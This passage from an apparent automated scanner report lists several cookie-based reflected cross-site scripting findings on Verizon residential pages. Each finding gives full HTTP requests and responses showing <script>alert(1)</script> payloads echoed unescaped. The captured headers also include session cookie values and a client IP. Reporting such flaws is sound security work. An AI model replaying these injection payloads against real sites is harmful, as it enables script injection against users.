Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8f58f'><script>alert(1)</script>45f51d22094; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110658
Expires: Sat, 20 Nov 2010 00:12:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/
Set-Cookie: ContextInfo_State=TX8f58f'><script>alert(1)</script>45f51d22094; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8F58F'><SCRIPT>ALERT(1)</SCRIPT>45F51D22094 ' />
...[SNIP]...

1.65. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8e5cb<script>alert(1)</script>29788bcdb3c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8e5cb<script>alert(1)</script>29788bcdb3c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110654
Expires: Sat, 20 Nov 2010 00:12:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:47 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:47 GMT; path=/
Set-Cookie: ContextInfo_State=TX8e5cb<script>alert(1)</script>29788bcdb3c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:47 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:47 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:47 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8E5CB<SCRIPT>ALERT(1)</SCRIPT>29788BCDB3C </DIV>
...[SNIP]...

1.66. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 323cd'><script>alert(1)</script>db7eded9442 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX323cd'><script>alert(1)</script>db7eded9442; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 129776
Expires: Sat, 20 Nov 2010 00:13:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX323cd'><script>alert(1)</script>db7eded9442; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:52 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX323CD'><SCRIPT>ALERT(1)</SCRIPT>DB7EDED9442 ' />
...[SNIP]...

1.67. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a1439<script>alert(1)</script>7afc59f4fcb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa1439<script>alert(1)</script>7afc59f4fcb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 129772
Expires: Sat, 20 Nov 2010 00:14:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:04 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:04 GMT; path=/
Set-Cookie: ContextInfo_State=TXa1439<script>alert(1)</script>7afc59f4fcb; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:04 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:04 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:04 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXA1439<SCRIPT>ALERT(1)</SCRIPT>7AFC59F4FCB </DIV>
...[SNIP]...

1.68. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3eca3<script>alert(1)</script>d981b509d0a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX3eca3<script>alert(1)</script>d981b509d0a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77952
Expires: Sat, 20 Nov 2010 00:11:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:56 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX3eca3<script>alert(1)</script>d981b509d0a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:56 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:56 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:56 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3ECA3<SCRIPT>ALERT(1)</SCRIPT>D981B509D0A </DIV>
...[SNIP]...

1.69. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6db83'><script>alert(1)</script>29aa0ccd992 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6db83'><script>alert(1)</script>29aa0ccd992; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77956
Expires: Sat, 20 Nov 2010 00:11:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/
Set-Cookie: ContextInfo_State=TX6db83'><script>alert(1)</script>29aa0ccd992; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:42 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6DB83'><SCRIPT>ALERT(1)</SCRIPT>29AA0CCD992 ' />
...[SNIP]...

1.70. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload f4176<script>alert(1)</script>334615d8942 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXf4176<script>alert(1)</script>334615d8942; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71893
Expires: Sat, 20 Nov 2010 00:13:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf4176<script>alert(1)</script>334615d8942; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXF4176<SCRIPT>ALERT(1)</SCRIPT>334615D8942 </DIV>
...[SNIP]...

1.71. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cfc4'><script>alert(1)</script>fd78a1ef0ca was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4cfc4'><script>alert(1)</script>fd78a1ef0ca; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70302
Expires: Sat, 20 Nov 2010 00:12:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4cfc4'><script>alert(1)</script>fd78a1ef0ca; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4CFC4'><SCRIPT>ALERT(1)</SCRIPT>FD78A1EF0CA ' />
...[SNIP]...

1.72. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b82d'><script>alert(1)</script>f8ced5a7994 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX5b82d'><script>alert(1)</script>f8ced5a7994; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71904
Expires: Sat, 20 Nov 2010 03:14:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX5b82d'><script>alert(1)</script>f8ced5a7994; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5B82D'><SCRIPT>ALERT(1)</SCRIPT>F8CED5A7994 ' />
...[SNIP]...

1.73. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 4abd8<script>alert(1)</script>d0d4bb3410c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
